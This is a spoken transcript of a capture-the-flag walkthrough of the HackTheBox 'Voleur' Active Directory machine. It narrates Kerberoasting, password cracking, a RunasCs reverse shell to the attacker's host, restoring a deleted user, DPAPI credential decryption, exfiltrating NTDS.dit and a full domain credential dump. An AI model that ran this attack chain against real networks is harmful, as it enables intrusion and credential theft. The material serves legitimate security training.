What's going on YouTube? This is Ipsec, me doing Voleur from HackTheBox, which is a nice Active Directory box that's all about lateral privesks and pillaging shares. It starts off with discovering a document in a file share, giving us credentials to a deleted user and 2 service accounts. One of these accounts is for LDAP, and this account is a member of a group called Restore Users, so it's likely we can restore a deleted user. This is automated in Netexec, but not on the main branch yet, so I don't expect many people to know about it. The intended path is to use this LDAP account to perform a targeted Kerberos attack against the WinRM account, letting us get a shell on the box, then use RunasCS to switch to LDAP, giving us the ability to use PowerShell's AD module to restore the user. From here, we get access to the deleted user's profile, which contains DPAPI encrypted blobs, one of which to another user that can download an AD backup so we can run secretsdump to get root. One quick note, my old keyboard failed, so I switched to acquired a keyboard for this video. Hopefully the clickety-clack is back next video, so with all that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it Voleur, and then the IP address of 10.10.11.76. This can take some time to run, so I've already ran it. Looking at the results, we have 12 ports open, the first one being DNS on port 53, and the banner tells us it's simple DNS+. And whenever seeing this, I always scroll down and look to confirm, yes, Active Directory is at play. It's giving us the domain name of voleur.htb, and that's it. Normally we're used to seeing like an SSL cert with this LDAP that also gives us the host name of the box, because that's going to be the common name. Also, like if you have that SSL cert, you can see the certificate authority, and oftentimes it'd be like the hostname -ltd-ca or something like that that indicates Active Directory certificate services installed. We don't have any of that, so yeah, I'm just going to go ahead real quick and add it to my host file. So sudo v etc host. Then we can add 10.10.11.76. We'll put voleur.htb. And then I also always like adding the host name of the box. Since the LDAP certificate's not giving it, we can just use something like Netexec to pull it, right? So we'll do Netexec smb 10.10.11.76. And that will connect us over to the SMB service on this box. And we get the host name, which is just DC. Additionally, it tells us NTLM is disabled, so we can't do any NTLM authentication. We'll have to be using Kerberos. So let's just go ahead and add the DC. And I'm also going to do dc.voleur.htb, so we have all 3 ways we could reference this machine. So let's see what else we have, right? Kerberos, nothing too interesting. A bunch of RPC stuff. LDAP, we already talked about. 445, so we have SMB, which we connected to via Netexec, so we know that. Nothing really too interesting here. The odd thing is, on port 2222, we do have SSH. The TTL is 127, and then the banner is also telling us it's Ubuntu. So I don't know exactly what's at play here. Maybe it's like WSL, the Windows subsystem for Linux or something, because if this was a complete VM, I would expect the TTL to be decremented in extra time because you got an extra hop. Additionally, Linux's default TTL is 64, so I'd really expect to see this TTL to be like 62 or something like that. So it's odd that it's 127. I know it's not running like the SSH for Windows because we have the banner telling us it's Ubuntu. So I can't really explain what's going on here other than it's odd and we have an SSH with a Linux server. Other things to note, we have another LDAP port. Nothing really too interesting, right? So scrolling down, we do see a clock skew of 8 hours. So before doing anything Kerberos related, we'll probably have to run NTP date to sync the time. And we know we're probably going to have to run Kerberos stuff because, well, we saw NTLM authentication was disabled, right? So let's just go ahead real quick and generate our Kerberos host file. I like using Netexec for that. So we'll do Netexec smb 10.10.11.76. Really, whenever doing Kerberos stuff, you should use the host name. So we'll do that instead. You don't have to because Netexec is smart enough to pull it, but a lot of tools aren't, so it's a nice habit to get into. And then we'll do the gen-kerb5 file. I want to say this is, I probably got this name wrong, but let's just see. I did. Is it kerb file, nxc-h, we have to do smb, kerb, uc cache, generate. I have to spell it. Okay. There we go. So that's going to give us the Kerberos file. And if you want to look at it, you can. It's just this, right? The key thing is it just configures Kerberos for us. So any like default Linux tool we use should just magically work, right? So let's just do cp this Voleur KRB over etc-kerb5.conf, and then we can start progressing. This is an assumed breach box, so we start out with a set of credentials. So I'm just going to go plug these in so we can do Ryan Naylor. So let's go back to our netexec command and get rid of this -u Ryan Naylor, and the password is going to be this hollow October 31 NYT. And we run this, and oh, status not supported. We have to add the Kerberos flag, right? So that's going to tell us the clock is wrong. Let's do this. The third time is the charm, right? So we're setting the time now with NTP date, running it again, and come on, authentication success. That was odd. Okay. I'm not sure exactly what went on there, but there we go. We have an authentication. It doesn't say pwn because we don't have any type of shell. We could also test SSH. So I think it's SSH and then maybe it's like --port 2222. Let's see if that works. There we go. And we don't get in. I think Netexec does support Kerberos over SSH. I don't know if it does. I know there's a PR in order to do that, but I don't think that disabling NTLM would block us from using a username password on SSH. So let's go back to the SMB. We can run a -- shares to see if there's any open file shares. And oh, I'm on port. Okay. I was like, something is going weird, but that is just me forgetting I had that flag in. And we have to do the -k. There we go. So let's see. Do we have any file shares on this box? It's pulling, it's thinking. Let's see. We have admin, C, there's a default, finance, HR. We don't have read permissions there. We have an IT share, which we can read, net login, and sysvol. So let's go ahead and run RustHound. So I'll do RustHound CE, the domain, Voleur HTB, user, Ryan Naylor, and the password is not that. We'll delete this and then go ahead and grab that password again. Save that. And while that's running, let's just go into my opt bloodhound server directory. We can do a docker compose up-d to start the bloodhound service. And we're going to start importing these files, right? So let's just click here, and then we're going to go to HTB, Voleur, give it all these JSON files, upload, close, and if we go over to the administration service, it is ingesting, and it'll take a minute or two to upload. So while that goes, let's just take a look at that SMB, right? We had, I think it was the IT share. I'm going to run that again while we just type out this SMB client command. And we have to remember we have to use Kerberos. So with SMB client, I'm going to use realm is equal to the domain and then -u. The username or the domain is voleur.htb, Ryan Naylor %. The password, which is hollow31night. Like that. Let's put this in single quotes. I'm going to add the -l. It's going to show me all the shares because I just want to make sure I did this command correctly. So we run this. You could also use like smbclient.py. I just like using SMB client because I'm used to all the syntax, right? It's also got a little bit less signatures because a lot of times impacket itself will be signed, or not signed, but like heavily sigged. Things like the Kerberos ticket options. It even looks different on like the actual wire. There's a like process ID, I want to say, in Wireshark that it's going to be unique to impacket. There's a bunch of ways you can sig impacket. So when I can, I normally avoid using it, just in case the client has heavily signatured it. SMB client itself can also be signatured, but it's more legitimate use case than impacket, right? You may see sysadmins using SMB client, especially when we see there is an SSH server here on port 2222. you'll almost never see a sysadmin just randomly deciding to use impacket, right? That just doesn't happen. We do have an Excel file, so let's go ahead and download this. And we can exit out of smbclient. And let's see, if we try to open Access Review, LibreOffice is thinking. We need a password to open it. So we can't open this. Let's cancel out whatever. We're going to use, is it Office to John? There we go. On this file, that's going to give us a hash, which we can just pass into Hashcat. So I'm going to do SSH to the Kraken. You can run Hashcat anywhere. I like running it on a different host, especially when I'm recording, because cracking is a very CPU intensive process, which could lead to just random issues like drop frames and things like that. I just recommend doing it on anything but a VM because it is CPU intensive and likes to use the GPU, and VMs don't play well with that. So let's do Hashcat, the file opt word list rocku. We'll see if this ends up cracking. We need to specify the hash. What? The hashes. I did not expect that, honestly. Maybe we need to say -- user because it did put the file name and then the hash. It's probably going to be now mode 9600 MS Office. That looks much better than generic hash, right? Hopefully this cracks. If it doesn't, then I'll probably just switch over to use John, but I know Hashcat can crack Office files, so those other modes are definitely confusing me. The Python interpreter, free threading, things like that. There we go. It has started. How long does this think it will take? Where is the time? Come on, where's time? Recovered. I must be blind. We're done. So we can do -- user -- show. I probably have to get rid of the word list. There we go. Show with username and Dominican calls. We need the hash. There we go. The password is going to be football1. So let's go ahead and try this. So I'm going to open this file back up, football1, and it opens this Excel document. Awesome. So let's see. Ryan Naylor has Kerberos pre-auth disabled. Let's see. We have Todd.Wolfe, who left, and it says the password, but the user account is disabled. So if we try to use this, it's probably just not going to let us. So let's just go back over to a Netexec. What is it? Todd. Is it 2? Did I spell that correctly? Yep. Wolf with an E. Let's just confirm they have deleted him. Every now and then you see like they say the account is deleted, but it's not really deleted. But we get a principal unknown. So chances are this account is definitely gone, right? Let's see. Jeremy.Combs has access to software folder, administrator, not to be used for daily tasks. Service backup, password is speak to Jeremy. Let's see, service LDAP, and we got a password. So let's try this. So svc_LDAP. Try this password. And that works. So we have an LDAP password, service IIS, and we got this password. So let's see. IIS. Put this in. And we get the password. And then WinRM need to ask Lacey if she has reset this recently. So we got 2 credentials out of this, LDAP and IIS. Let's go over to the bloodhound data now that it's definitely done ingesting. And we can set all our users to owned. So what was our first user? Ryan. So let's go to Ryan. We'll mark Ryan as owned. And then we have the service LDAP. We can mark them as owned. I also want to see what groups LDAP is a part of. So let's just say owned, member of, users. There is a restore user group and domain users. So it looks like LDAP can undo deletes in Active Directory. We saw Todd.Wolfe in the Excel was deleted. So chances are we can use this service LDAP in order to restore them, right? We also got a service IIS. So let's see what this is. And we can say add to owned. And I like seeing what members this is of. Only two is going to be users and domain users. So now let's go run our Cypher query. And we can say shortest paths from owned principals or owned objects, I guess it is now. Run this. And we don't want to restore pages. Let's see. There we go. So let's see what we have. 3 users are a member of domain users. So that's not too interesting. Service LDAP can write the SPN of service WinRM, and WinRM is a member of remote management users. So this is going to be the intended path. We can use service LDAP to take over the WinRM user and then get remote access into it. There is another path. We can use service LDAP directly to restore the user and then restore Todd.Wolfe's account, right? The intended path is meant to be easier. We jump through LDAP to WinRM, we get access to a shell, and then we can use RunasCS to switch to the LDAP user. And then with PowerShell on the domain controller, it's much easier to restore the object, right? But there are tools within Netexec to automatically restore objects without needing a shell. So the only reason we're going to be doing this whole targeted Kerberos step with write SPN is because it's not common knowledge on how to restore deleted objects without having a shell on a Windows box. Hopefully that makes sense. So we're going to go through this path first. And then after we get the object restored through the PowerShell, we're going to go and show the other way, right? So we want to do a targeted Kerberos attack from service LDAP to write SPN because that's how we get remote access to this box, right? If I went to service LDAP and we change this to WinRM, it's going to say we can't log in. Invalid NTLM challenge. That should have used Kerberos. Okay, that's fine. Let's see. So we want to do a targeted Kerberos attack. So I'm going to use bloody AD, and we'll use what is the flags? We have to specify the host and domain, I want to say, so -d, and then we'll use DCIP. Oh no, host, there we go. So let's do bloody AD -d Voleur.htb host DC Voleur HTB, and then user is going to be svc_LDAP. The password is, where is that? Right here. We can grab this, paste that in. Let's see. We also want to add -k for Kerberos, and then we want to set object, and then was it service WinRM, and then the service principal name, and we're going to set that attribute http/ please subscribe. It doesn't matter what we set the attribute to. It can be anything, because once this attribute's here, that's going to be what enables us to do the Kerberosting attack. I think the default thing would be http/ dc.voleur.htb would be the most common. There's also a Python script called TargetedKerberost, which would automatically do all this for you, but I like just doing it manually. Not exactly sure why. I think it's mainly just because I don't like having to like download 50 scripts. I just like having as little tools as I can. So we can do nxc. I want to say it's LDAP and then -- Kerberosting, right? Kerberost expects 1 argument. I'm just going to give it a dash, and that should, I need the K. There we go. We get a hash. Did that save a file as a dash? It did save a file as a dash. I was hoping that would be like just output to standard out, but it did not do that. Maybe I need to give it like dev null. So let's save this. And then let's go back into the Kraken. Go in hashcat v hashes Voleur.Kerberost, I guess. That's a password. Paste that. Hashcat, the file opt word list rocku. And we'll start cracking this. And while it cracks, mode. I wonder if something's going wrong. Why is that detecting everything? I didn't rebuild hashcat lately. I have no idea. Okay. But while that's going, I'm going to use bloody AD again. And if we give it the set object, this is going to unset the service principal name. So if we run this whole netexec command again, it's not going to be able to get the hash because we unset the principal name, so there's no more Kerberosting. It looks like it has cracked, so let's just do a -- show, and let's delete the word list. And let's see, this password, a fire inside, I'm guessing maybe, I don't know what this is. Maybe that's an album name. I'm just saying album name because AFI is at the end of it. Let's see. Service WinRM. Paste this in. We can get rid of Kerberosting. WinRM. Let's see. It says -K for Kerberos. I wonder if something's wrong with my netexec. Oh, NXC WinRM only supports NTLM. Okay. Helps to read. So let's now switch over to evil WinRM. And we can give it -I, DC, Voleur, HTB, user, service, WinRM, the password, this. And let's see, how do we specify Kerberos? There we go. -R, required if not using Kerberos. It looks like we have to use the Kcache files. Let's try this real quick. Set the realm. Yeah. So I'm going to do a get TGT. And this is going to be Voleur HTB service WinRM, the password. And this should get us a Ccache file. We can say evil WinRM. We no longer need the password. I don't think we need the username as well. I think we just use realm. Kerbe5cc name is equal to the Ccache file. And awesome, we get in. So what we want to do now is get run as CS on this box so it can switch over to the LDAP user. So let's go ahead and make a directory /. And then I'm going to cp opt sharp collection. Is it net framework for, let's just use 5, I guess. Really doesn't matter what version of .NET to use as long as it's on the box. I hate the file name for this. I'm just going to do run as cs.exe. There we go. Python 3, start up our web server. And then we can wget http 10.10.14.8, 8000, run as cs.exe, run as cs.exe. Save that. And we should be able to run this tool, right? Yep. What are the options we need? We need the username, so service LDAP. And then we need the password for this user. let's just go ahead and copy this again. That's not the password. That is WinRM's password. There we go. And then after this, we need to know what we're executing, which is going to be PowerShell.exe. And we're going to send it to 10.10.14.8 port 8000. Not 8000, due to 9001. And I like using RL wrap with this. So when you run this, helps if I don't typo things. PowerShell, there we go. And we get a shell, awesome. So let's go ahead and what do we want to do? We had a deleted user, so we want to restore that. So I'm going to get AD object filter is deleted is equal to true. We also have to add include deleted objects. And let's see, we have this. We have a deleted container as well. We could also change the filter to only show users. So if we wanted to, we could also say -and object class is equal to, I want to say we have to do it in quotes. There we go. So that'll only show users, right? So we have this deleted object. The GUID is right here. So all we have to do is a restore object. So we can say restore AD object, then identity, and then the GUID. And now that Todd.Wolfe account isn't reinstated. That's funny that I guess RunasCS, like it was tied to that. That's weird. Let's do Todd.Wolfe. So we do this and it hopefully will let us on, right? So now we have restored access to Todd.Wolfe. I'm going to revert the box, and we're going to do this without getting a shell on top of the Windows. We'll do it completely through Netexec. Okay, the box should be reverted now. So if I try running this with Todd.Wolfe again, it's just going to give us the principal unknown error. Now, all this is doing under the hood is really issuing some LDAP commands, right? I'm going to, let's go over to Google, not DuckDuckGo. I'm going to search Mubix LDAP because he has a pretty good LDAP reference of things to run. If we look at deleted tombstone objects, we can't run his command verbatim because it's using NTLM authentication. That's disabled. But we can see we specify this deleted objects thing and then give it this weird thing. And this is going to be like an extended code or something like that that just enables us to search for deleted objects. I'm trying to find a reference to it online. There we go. So that's going to be the LDAP server show deleted OID key. And you can see right here, it's defined as this long string of numbers. So that's all that's doing. Let's go ahead and run the LDAP command ourselves. The first thing we need to use is Kerberos with ldapsearch. So I'm going to do kerb5 cc name is equal to service. We don't want to use WinRM. We have to get a TGT. So let's do get TGT. Voleur, let's do service LDAP. And then the password like that. And then we can say kerb5 cc name is equal to service LDAP cache. There we go. And then we want to run, it was LDAP search, then -H, and we can specify LDAP :/ Voleur HTTP. We have to specify we want GSS API authentication. And then the actual query, let's go back to the reference. This. Paste that in. Let's see. We had some error. Generic failure. Server not found in Kerberos database. That's not what I expected. We have the date set. Oh, I bet this is that stupid, if I ping, let's see, 10.10.11.76, it's not doing it. I bet it's resolving the host name, like the DNS name, based upon the first entry in my host file. And it's getting the domain name when it's expecting to get the fully qualified name. So let's actually put the FQDN first in the host name. I know this is going to sound silly, but bear with me. Let's see what happens. Run the same command, and there we go. It works. So that is the issue. I've ran into that issue so many times in Linux stuff. But we can see the user account is deleted in ldapsearch. So if we're really good at ldapsearch like command line, we can just manually restore it. I'm not. And thankfully, if we go to GitHub, Netexec, there is a PR request. And I already have this in my history file, so I'm going to cheat a little bit. We'll just go directly to the create tombstone module. And it gives us a way to do this. And the interesting thing is, like, this box was actually used. You can tell because they did a good job censoring a lot, like the password, the username, but we can see the output right here, voleur.htb. So someone had created this module and used this machine as testing it, right? And they're talking about some error here in Kerberos, and then the author of the pull request is saying, yep, I used this box as well. But yeah. So let's go ahead and install this version of Impacket. So let's do a git clone, paste this in. Then we can switch to Netexec. And I'm going to do a git pull origin pull. That was 736. Uh-oh. I never know what to do with this option. Let's go rebase true, maybe. That sounds less dangerous, maybe. Rebasing. Let's see, find dot grep tombstone. Okay, we have the module there. Awesome. They also talk about a unique version of Impacket, so I'm also going to clone this. So I'm just going to a git clone on the Pennyworth Impacket. And then we want to do a Python 3 module vm.vm, and we can say source bin activate. So bin activate. I'm going to go into Impacket. We can say pip3 install dot. And let's install this. It shouldn't take too long. Let's install Netexec as well. And this is going to take some time to install, probably like 2 to 3 minutes. So I'm just going to pause the video while this installs. Okay, Impacket is installed. So now we should be able to do a Netexec, SMB. We want to go the service LDAP, and it's not SMB, it's LDAP. Netexec, and then the password is this. Run it. And I also want to say which NXC are we using mine? Yes, I am. I just want to make sure I'm using my virtual environment, not the one from UV, which is how I think I installed Netexec. But we can do the, I think it's -L to list modules. We see there is a tombstone module. So if we do -M, tombstone, and let's see how they do it. There's an action flag, right? Let's see. They do -O, action equals query. So action is equal to query. And I know in the screenshots, they're saying they called it the Gravedigger module. They renamed it to Tombstone in this PR. So we have this, and we have the ID here. So the next one is action is equal to restore. ID is equal to this. And let's see. We have a SSL socket wrapping error. And the reason it's doing this is because Netexec is switching over to LDAP-S, and the LDAP didn't have certificates installed. So that's not just configured. So what we want to do is set a scheme. And if you want to look at the options, because I don't think the scheme is actually referenced at all in the PR, let's see. There should be an options flag, right? Options to play with. So we do the -- options. And that's going to give us all the options for a module. So we have, where is scheme? ID. I know there's scheme. Oh, there we go. Scheme. Forced to use LDAP or LDAP-S. By default, it uses LDAP-S. So what we want to do is go back to our action and can say scheme is equal to LDAP. And hopefully this restores. There we go. Success. Todd.Wolfe has been restored. So if I do a Control-R, Todd.Wolfe, it does not like something. I'm not sure what happened, but that's probably because my pip install broke something. Maybe I don't have SMB modules in my environment. Don't know. Let's just see if this works. Awesome. There we go. So we have restored the Todd.Wolfe account. So that is doing it through Netexec. There is one other thing. If you still get errors, you probably have to install a library. I did a sudo apt install, what was it? Like Python 3-GSS API, I want to say. Let's do apt search. That's what it is on Parrot. But you want to install this if you have errors, even when specifying scheme is equal to LDAP. I think that's what fixed my box. But now that we have Todd.Wolfe, we can look at what they can do. So let's go back to Bloodhound. We can do search, specify Todd. What? Oh, that's funny. Bloodhound did not grab Todd.Wolfe because they were disabled. So let's go back to RustHound. I don't want to put it in Netexec's directory. Make dir rust. That's probably a bad name for this, but I just want to have a unique JSON file. So now we can go back into administration, upload files, HTTP Voleur, and go to this directory, upload all of these, close out. And we're going to wait for this to finish ingesting so we can take a look at what information Todd.Wolfe has. And now that that's done, let's go over to Explorer and search for Todd.Wolfe. There we go. He appears. And let's see what they have access to. So let's see. They are a technician. Member of. There's no outbound controls. If we look at member of, remote user managers, there is a second line technician. If we remember, the folder for the very first user was a first line technician. So let's go take a look at the SMB client. So let's do SMB client -U, was it? I could have swore I had it. Let's see. Maybe my pip virtual env is screwing me up. So let's just get a clean slate. And then we can do SMB client realm is equal to Voleur HTTP-U, Voleur HTTP, Todd.Wolfe. I think that's how you spell it. And then the password that was in the spreadsheet, right? The nighttime pigeon. Paste that. And then that was DC Voleur HTTP IT. Let's see. If we do a dir, there is a second line support. So if we do a cd to go in here, I wonder if I can just do a space, put it in quotes. There we go. There is an archived users, and we're probably going to get a lot of files here, right? If I do a dir, Yeah, it's his user directory. So instead of doing this all through smbclient, I'm going to switch and use Spider Plus from Netexec. So we're going to do nxc smb dc voleur htb user Todd.Wolfe, the password of that. And then I'm going to specify the module spider_plus. And I also want to change some options real quick. I want to see what the default excluded directory is first. So once this starts, I'm going to kill it. TODDWOLFE. That is right. Let's do the netexec to re-enable the account again. There we go. Run this. And let's see what this does. Okay. So there is this exclude filter, right? And I want to add 2 directories to it because if we exit this, we can just do a-l. Because there's always going to be like the sysvol and net login. I also don't want to crawl those. So we're going to do a -o. Exclude filter is equal to print $IPC $sysvol and net logon. Because that's just going to like make our script take longer. Not a values to unpack. That is a equals, not a colon. And cancel because I typoed. There we go. So let's go back into smbclient. I'm going to go second line support. Then it was archived users. And we're going to wait for this to finish. We can see the exclude filter does have all these directories, so we should only crawl the IT share. And then once we have this, we're going to have a list of every file on the share, which is going to make it a lot easier for us to navigate instead of just like doing CDs and going through a file browser. So I'm going to pause the video. We're going to let this finish. It'll probably take like 5 minutes. I think it's not the quickest, but it is nice. Okay, the Spider Plus is done. It saved everything to this file. I'm just going to copy it to my directory so I have it here. And then we can cat the file and do JQ. And we get quite a lot. I don't like how it shows all the timestamps like this. So we could just put it to keys, and that's going to show the file shares. If we do map values to the keys, we're going to get a list of every file. This is the way I like viewing it. So if we look at the top, let's see, does anything stick out? We do have something that sticks out. So this is going to be the user's directory, right? And it's a full backup of it. And right here, we have the DPAPI master key. We also know the user's password. So if that password goes to this key, then we'll be able to access anything they have saved in DPAPI. So I'm going to go ahead and save this note. So V files, I'm just going to put that there. And the next thing we want to look at is anything DPAPI related. I'm just going to do a quick grep for, what is it, S1521. That's what every SID begins with, I want to say. And then here we go. I knew the like DPAPI blobs were stored in files in the UUID, or not UID, the SID. So we can see we do have one blob for it. We could also try to pillage Chrome or Internet Explorer passwords. There's a lot of things that DPAPI just stores, but we have this blob too. So let's just go ahead and see if we can enumerate their credentials. If I exit this, I'm just going to cat files here so I have it in a better location. So I'm in archived users. I want to go to Todd.Wolfe and go into this directory. Actually, let's just go here. And then I should be able to just do download, right? Or git. I think it's a git and smbclient. Error opening local file. App data. Let's see. I'm in Todd.Wolfe. cd app data. Okay, I must have typoed something. We should be able to download this. Local Microsoft credentials. I think it's trying to like create the whole directory structure, and that's where it's failing. I don't know exactly, but this hopefully works. There we go. Let's go up a bunch of directories. We want to go into roaming, Microsoft, protect. Do wildcards work? No. Let's just copy and paste this. And then we can do a git on this. Okay, so we should have two files. This is going to be the encrypted blob, and this is the master key, I want to say. So let's do impacket-dpapi master key. No, I have that mixed up. Master keys are UUIDs. So we'll do this, -sid. Grab this. Paste. And then after sid is their password, which we have in this. So hopefully this works. We need -file. There we go. We have decrypted with this key. So now we should be able to decrypt all the blobs. So let's do pretty much the same thing. So impacket-dpapi, credential, file. What file do I have? It is df. Okay. -key, paste that in. And let's see, Microsoft alt state, seeing if we have any credential. Does not look like. Oh, there we go. We have a persistent credential of this. I don't have a username. Virtual app did logical. Not sure what this is. And that's not even a password. That's a weird username. It's going to put odd and have that there. Let's go back to my JQ. And what is that file? So we want to look for something like this. 32 characters. So let's try something. Let's do a grep for all capitals of hex 32. That did not work. Do we want it in A to Z 0 to 932? Okay, we have a few hits. Let's see. What do I want to call this? I'll do potential blobs. And then we can do a grep. I think -f is for file. Let's see, man, grep. Lowercase f maybe. There's a pattern file. Okay. So these are potential blobs. We did support app local credentials, remote script, URL cache. We have another one as well. Let's see, Todd.Wolfe, and roaming Microsoft credentials. There's one that begins with 77. So let's try going to this one. Let's go. I think it was roaming Microsoft credentials, I said. And now we can do a get on this. And where is our DPAPI? There we go. We'll do file 77. And we have another credential, Jeremy.Combs and a password. So this is why I like having just files because, or a file listing, because I really like using grep and then changing it up to see like how I can find other things. One thing just stood out. That wasn't the thing I needed, but it told me, hey, DPAPI's in play. So let's change it for grep and find other keys. So just being good with grep and having files is very, very underrated. But let's just test this out. So we'll do Netexec again. Jeremy.Combs, the password of this. And we also need -K. So that's working. Principal unknown because I probably cannot type. We've already found that out. There we go. So let's go ahead and go here and see what we have. So Jeremy.Combs. Man, my mouse is like double clicking here. There we go. Member of, third line, remote management. But now that we're third line, I guess we should take a look at what we have access to. So let's go here. Delete that. Not Todd.Wolfe. Jeremy.Combs. Copy. Paste. dir. Third line support. And we have a SSH key and a note. So let's get IDRSA, get note.text.text. Cat the note. It looks like it is WSL. So this is probably going to go to the Linux. So I've partly configured WSL to see if I can utilize any backup tools from Linux. So we do have an IDRSA key. And if I cat this, let's see. I'm going to show two ways we can see where this key goes. I'm just going to edit the .back real quick. We can delete that. If we base64 decode an SSH key or a private key, right? And then we pipe it to XXD, we can see we have SVC_backup. This is going to be part of the public key, right? I think that's at the bottom. Yeah. So this is how we know where it goes. So SVC_backup at DC. You can also just use SSH keygen. So if we just did SSH keygen -y and the file ID RSA, chmod 600. Let's give it the right permissions. It'll give us the public key, right? So we know this goes to service backup. So let's do SSH-I IDRSA SVC_backup at was it 10.10.11.76? I guess I could have used the host name as well. I think it's -P for port because SSH was listing on port 2222. It is thinking. I don't like how long it's taking. SH-H grep-I port. Lowercase p. Maybe SCP used the uppercase P. Yes. And there we go. Now we have SSH to the DC. If we go to CD/, let's see, run mount. It looks like the C drive is mounted on mount C. So let's see, can we just go cd users, administrator, permission denied. So we don't have permission to go there. Let's see, WinRE agent, recycle bin. Let's see, is there any interesting files? If we go in IT, there is the third line support. And here there is a backups directory. I don't know why this didn't show up on SMB, but if we go into backups, we have Active Directory and registry. So if we do find.-type f, we have the NTDS.dit and the security and system hive keys. So this is going to enable us to back up or run secretsdump against the domain controller. So let's just go and copy this. So we'll do scp-i idrsa svc_backup at 10.10.11.76. I'm going to do capital P because I'm pretty sure this one is port. And we want to back up this directory or copy it. I think -r for recursive. Oh, wait. It is : that. It's taking a long time. Maybe it's still lowercase p. scp-h. Nope, uppercase P. Maybe it has to go before. And let's see, there should be a recursive flag. I think that's -r. Let's see, third line, we have to put this in quotes because there's a space. We could probably just escape it with the / as well. Don't know what that's from. Okay. Like the 5th time is the term, right? There we go. Now it's dialing ntds.dit. So we can do a secretsdump.py system, specify the system file. I think it's lowercase actually. System, security, NTDS. And then I think we specify local. Did I do this correctly? No such file or directory system. Let's see. It looks like it saved it to backups. Let's just cp backups registry. CP backups Active Directory NTDS.dit. Okay. Now they're all in my working directory. And we're now dumping everything. Awesome. So if I go search for administrator, we can see the administrator hash is this, whatever. So let's go copy this. And we'll try to netexec. So nxc smb 10.10.11.76 administrator, the hash, and we probably have to specify Kerberos. I think I fat fingered a character. Status not supported. Can we do -k? And there we go. So let's do psexec -hashes. Put this hash in. I think -k for Kerberos, administrator at DC Voleur HDB. Something errored. This is probably going to fail. Do I do hashes with a colon? There we go. Empty domain not allowed in Kerberos. Is there like a realm? DC IP, port, service, hashes. Maybe it wants Voleur HTTP like that. There we go. Now it's uploading psexec. And we get in. So here's users, administrator, desktop. And we should be able to type root.txt and get the flag. So with that being said, the box is done. So I hope you guys enjoyed it. Take care, and I will see you all next time.